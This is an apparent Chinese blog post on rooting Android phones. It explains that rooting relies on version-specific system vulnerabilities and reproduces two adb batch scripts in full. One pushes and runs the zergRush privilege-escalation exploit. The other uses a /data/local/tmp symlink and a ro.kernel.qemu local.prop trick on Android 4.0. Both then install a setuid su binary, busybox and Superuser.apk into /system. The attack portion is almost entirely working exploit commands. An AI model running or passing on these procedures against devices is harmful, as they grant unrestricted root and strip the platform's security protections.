1 Android下面想做事情,会有权限限制。所以经常需要提取Root权限。
2 Android下面获取Root权限的方法并不完全是一样的。这是由于Android的源码漏洞决定了的。提取Root权限就是利用Android系统的漏洞。所以不同的版本的漏洞是不一样的,才导致提取Root的方法是不一样的。
3 Android获取Root的最终步骤是:在System目录下的bin或xbin目录下,放一个有root权限的su文件。在xbin下面放入一个busybox文件;另外装上一个SuperUser.apk,用来管理权限的使用。
4 Android版本的漏洞有下面几个:
5 提取Root的指令如下:
@echo
@echo
@echo
@echo
@echo ---------------------------------------------------------------
@echo
@echo
@echo
@echo
@echo
@echo
@echo
@echo
@echo
@echo
@echo
@echo
@echo
@echo ---------------------------------------------------------------
@echo
@pause
@echo --- STARTING ----
@echo --- WAITING FOR DEVICE
@files\adb wait-for-device
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- pushing zergRush"
@files\adb push files\zergRush /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 777 /data/local/tmp/zergRush"
@echo --- executing zergRush
@files\adb shell "./data/local/tmp/zergRush"
@echo --- WAITING FOR DEVICE TO RECONNECT
@echo if it gets stuck over here for a long time then try:
@echo
@echo
@echo --- DEVICE FOUND
@files\adb wait-for-device
@echo --- pushing busybox
@files\adb push files\busybox /data/local/tmp/.
@echo --- correcting permissions
@files\adb shell "chmod 755 /data/local/tmp/busybox"
@echo --- remounting /system
@files\adb shell "/data/local/tmp/busybox mount -o remount,rw /system"
@echo --- copying busybox to /system/xbin/
@files\adb shell "dd if=/data/local/tmp/busybox of=/system/xbin/busybox"
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/xbin/busybox"
@echo --- correcting permissions
@files\adb shell "chmod 04755 /system/xbin/busybox"
@echo --- installing busybox
@files\adb shell "/system/xbin/busybox --install -s /system/xbin"
@files\adb shell "rm -r /data/local/tmp/busybox"
@echo --- pushing SU binary
@files\adb push files\su /system/bin/su
@echo --- correcting ownership
@files\adb shell "chown root.shell /system/bin/su"
@echo --- correcting permissions
@files\adb shell "chmod 06755 /system/bin/su"
@echo --- correcting symlinks
@files\adb shell "rm /system/xbin/su"
@files\adb shell "ln -s /system/bin/su /system/xbin/su"
@echo --- pushing Superuser app
@files\adb push files\Superuser.apk /system/app/.
@echo --- cleaning
@files\adb shell "cd /data/local/tmp/; rm *"
@echo --- rebooting
@files\adb reboot
@echo ALL DONE!!!
@pause
Android4.0下:
echo off
cls
echo.
echo by zopo008 (欢迎访问bbs.zopomobile.com.)
echo.
echo.
adb shell mv /data/local/tmp /data/local/tmp.bak
adb shell ln -s /data /data/local/tmp
adb reboot
echo Rebooting (1/3) - Continue once device finishes rebooting
echo 正在重启手机(第1次,共3次)- 请等待重启完毕,之后按任意键继续
pause
adb shell rm /data/local.prop > nul
adb shell "echo \"ro.kernel.qemu=1\" > /data/local.prop"
adb reboot
echo Rebooting (2/3) - Continue once device finishes rebooting
echo 正在重启平板(第2次,共3次)- 请等待重启完毕,之后按任意键继续
pause
adb shell id
echo If the id is 0 / root then continue, otherwise ctrl+c to cancel and start over
echo 如果上面显示的id为0或者root,按任意键继续;否则按Ctrl-C并回复Y来取消本次root尝试,然后重试
pause
adb remount
adb push su /system/bin/su
adb shell chown 0.0 /system/bin/su
adb shell chmod 06755 /system/bin/su
adb push busybox /system/bin/busybox
adb shell chown 0.0 /system/bin/busybox
adb shell chmod 0755 /system/bin/busybox
adb push Superuser.apk /system/app/Superuser.apk
adb shell chown 0.0 /system/app/Superuser.apk
adb shell chmod 0644 /system/app/Superuser.apk
adb push RootExplorer.apk /system/app/RootExplorer.apk
adb shell chown 0.0 /system/app/RootExplorer.apk
adb shell chmod 0644 /system/app/RootExplorer.apk
echo Removing changes except ROOT
echo 正在进行清理和恢复
adb shell rm /data/local.prop
adb shell rm /data/local/tmp
adb shell mv /data/local/tmp.bak /data/local/tmp
adb reboot
echo Rebooting (3/3) - You should now be Rooted
echo 正在重启平板(第3次,共3次) - root成功
pause
echo on